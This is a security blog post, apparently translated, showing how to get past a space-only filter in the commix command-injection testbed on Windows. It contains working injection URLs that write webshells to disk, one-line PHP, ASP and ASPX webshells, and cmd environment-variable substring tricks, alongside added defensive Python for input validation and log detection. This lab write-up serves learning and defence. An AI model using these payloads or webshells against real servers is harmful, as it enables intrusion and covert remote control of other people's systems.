Hacking Book | Free Online Hacking Learning


Bypassing the space filter in the commix command-injection testbed

Posted by patinella at 2020-02-27

Operating system: Windows Server 2008 R2 x64 & Windows 10 build 17134

Test environment: phpstudy (PHP / 5.6.27 + Apache / 2.4.23 + MySQL 5.5.53)

Reading the source code of classic_non_space.php shows that the input is filtered by a regular expression that matches spaces: the submitted GET or POST parameter is checked for whitespace, and if any is present the command is not executed; if none is present, it is executed.
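To make the weakness of that check concrete, here is an added example (not code from the commix testbed or from this post) that reproduces the space-only filter as the page describes it, puts an allowlist hostname validator and a shell-free argument vector beside it, and runs both over a few constructed `addr` values, including the page's own space-less payloads. The `ping -n 1` argument vector is an assumption about what the testbed intends to run; the sample values are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the `addr` parameter (not captured traffic).
# The last two mirror the space-less payloads shown on this page.
SAMPLES = {
    "benign": "baidu.com",
    "with_space": "baidu.com & echo hi",
    "no_space_echo": 'baidu.com%26echo="<?=phpinfo();?>">C:\\phpStudy\\WWW\\commix\\a.php',
    "envvar_substring": "|net%path:~10,1%user>C:\\net.txt",
}


def weak_space_filter(raw_value: str) -> bool:
    """The testbed check as the page describes it: the decoded parameter is
    rejected only when it contains whitespace. True means 'allowed through'."""
    value = unquote_plus(raw_value)  # roughly what PHP's $_GET hands the script
    return re.search(r"\s", value) is None


# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def strict_hostname_check(raw_value: str) -> bool:
    """Allowlist replacement for the blacklist: accept only a syntactically
    valid hostname, so shell metacharacters and '%' can never get through."""
    return HOSTNAME_RE.match(unquote_plus(raw_value)) is not None


def ping_argv(raw_value: str) -> list:
    """Build the command as an argument vector instead of a shell string
    (assumed `ping -n 1 <host>`); invalid input raises, so nothing reaches cmd.exe."""
    if not strict_hostname_check(raw_value):
        raise ValueError("addr is not a hostname")
    return ["ping", "-n", "1", unquote_plus(raw_value)]


def compare_filters() -> dict:
    """For every sample: (space filter allows it, hostname allowlist allows it)."""
    return {name: (weak_space_filter(v), strict_hostname_check(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (weak, strict) in compare_filters().items():
        print(f"{name:18s} space-filter passes={str(weak):5s} allowlist passes={strict}")
```

Run as a script it prints one line per sample: the two payloads from this page pass the space filter and fail the allowlist, which is the whole point of the page in two columns. The durable fix is the argument vector (or no command at all, e.g. a socket-level reachability check); the hostname regex is only the input-validation layer in front of it.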

Note: the author only tested and researched the space bypass on Windows. For Linux, see the reference links at the bottom.

(1) General execution mode

(2) Echo output (filter space)

(3) Echo output (bypass space)

https://github.com/3had0w/Blasting-Dictionary/blob/master/Commix%20-Space%EF%BC%8846%EF%BC%89.txt

(4) Echo to write a file (one-line Trojan)

Double quotes:

http://192.168.1.108/commix/scenarios/regular/GET/classic_non_space.php?addr=baidu.com%26echo="<?=phpinfo();?>">C:\phpStudy\WWW\commix\a.php

^Escape character:

Set /P variable:

One-line Trojans without spaces:

PHP:

<[email protected]($_POST["90sec"]);?>

ASP:

<%execute(request("90sec"))%>

ASPX:

<%@Language="Jscript"%><%eval(Request.Item["90sec"],"unsafe");%>

Note: PHP allows the short tags <?= ... ?> but does not encourage them. Short tags can only be used if the short_open_tag configuration directive is enabled in php.ini, or if PHP was compiled with the --enable-short-tags configuration option. https://www.php.net/manual/zh/language.basic-syntax.phptags.php#122618

Metasploit PHP Payload:

The generated PHP payload has no PHP open tag by default, so you have to add it yourself. It also restricts many commands and extensions, but we can still run commands such as upload, download and execute, and then upload and run an exe payload.

(5) Windows environment variable substring bypass

Principle of environment variable substring extraction (from brother destiny's analysis):

%...% expands the environment variable, and :~ takes a substring of its value. In %path:~10,1%, 10 means start at offset 10 (counting from the first character as 0) and 1 means take one character; a negative number such as -5 counts from the end, i.e. the fifth character from the bottom.

More environment variables containing spaces can be listed with the set command.
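For an analyst reading web-server logs, the useful skill is the reverse one: recognising %VAR:~offset,length% in a request and working out what cmd.exe actually ran. The following is an added example, not code from this post, that implements cmd's substring rules (negative offset and negative length included) and scans a few constructed Apache access-log lines for the expansion pattern. The PATH value in SAMPLE_ENV is an assumption chosen so that offset 10 is a space, as it evidently was on the author's machine; the log lines are constructed, not real traffic.

```python
import re
from typing import Optional

# %VAR:~offset[,length]% as cmd.exe parses it; offset and length may be negative.
ENV_SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*):~(-?\d+)(?:,(-?\d+))?%")


def cmd_substring(value: str, offset: int, length: Optional[int]) -> str:
    """cmd.exe substring semantics: a negative offset counts back from the end
    of the value; a negative length stops that many characters before the end;
    no length means 'to the end'."""
    n = len(value)
    start = min(offset if offset >= 0 else max(n + offset, 0), n)
    if length is None:
        end = n
    elif length >= 0:
        end = min(start + length, n)
    else:
        end = max(n + length, start)
    return value[start:end]


def resolve_env_substrings(command: str, env: dict) -> str:
    """Replace every %VAR:~o,l% with the characters cmd.exe would substitute.
    Variable names are case-insensitive; an unknown variable is left literal,
    which is also what cmd does."""

    def expand(m) -> str:
        name, offset, length = m.group(1), int(m.group(2)), m.group(3)
        value = env.get(name.upper())
        if value is None:
            return m.group(0)
        return cmd_substring(value, offset, None if length is None else int(length))

    return ENV_SUBSTR_RE.sub(expand, command)


# Constructed environment (assumption): PATH starts with "C:\Program Files",
# whose character at offset 10 is a space.
SAMPLE_ENV = {"PATH": "C:\\Program Files\\Java\\bin;C:\\Windows\\system32"}

# Constructed Apache access-log lines; the second carries the page's payload.
LOG_LINES = [
    '192.168.1.5 - - [27/Feb/2020:14:02:11 +0800] "GET /commix/scenarios/regular/GET/classic_non_space.php?addr=baidu.com HTTP/1.1" 200 512',
    '192.168.1.5 - - [27/Feb/2020:14:03:40 +0800] "GET /commix/scenarios/regular/GET/classic_non_space.php?addr=|net%path:~10,1%user>C:\\net.txt HTTP/1.1" 200 0',
    '192.168.1.5 - - [27/Feb/2020:14:04:02 +0800] "GET /commix/scenarios/regular/GET/classic_non_space.php?addr=baidu.com%26echo=x HTTP/1.1" 200 24',
]

QUERY_RE = re.compile(r'"GET [^ "]*\?addr=([^ "]+) HTTP/')


def scan_log(lines, env: dict) -> list:
    """Return one record per request whose addr value uses env-var substring
    expansion, with the command cmd.exe would have seen after expansion."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = QUERY_RE.search(line)
        if not m:
            continue
        value = m.group(1)
        if ENV_SUBSTR_RE.search(value):
            hits.append({"line": lineno, "raw": value, "resolved": resolve_env_substrings(value, env)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES, SAMPLE_ENV):
        print(f"line {hit['line']}: {hit['raw']!r} -> {hit['resolved']!r}")
```

The resolved value depends on the environment of the account the web server runs as, not on the attacker's, so for an accurate reconstruction take PATH (and any other variable named in the request) from the affected host rather than from a workstation. The regex alone, without resolution, is already a good detection rule: legitimate hostnames never contain `%...:~`.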

A problem encountered:

Normal execution in cmd:

C:\>ping|net%path:~10,1%user>C:\net.txt

Echo in the testbed is normal:

classic_non_space.php?addr=|echo=net%path:~10,1%user

Execution in the testbed produces a blank output file:

classic_non_space.php?addr=|net%path:~10,1%user>C:\net.txt

Execution in the testbed with normal output:

Note: the above problem may be specific to my personal test environment. Two testbeds, commix testbed and DVWA, were tested on two machines respectively. The output of net user is a blank file, but query user and other commands produce output normally. I asked a few friends to help test; they could get normal output, but I could not execute net or net1. I spent the afternoon looking for information and asked many friends, and I really don't understand what caused it. In the end I gave up and did not dig further into the cause. This is only offered as a way of thinking; in real engagements, pay attention to the question of privileges!

Temporary workaround:

1) echo=net user^>netuser.txt>C:\netuser.bat

3) http://192.168.1.108/commix/scenarios/regular/GET/netuser.txt

Reference material:

https://github.com/commixproject/commix

https://www.betterhacker.com/2016/10/command-injection-without-spaces.html

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
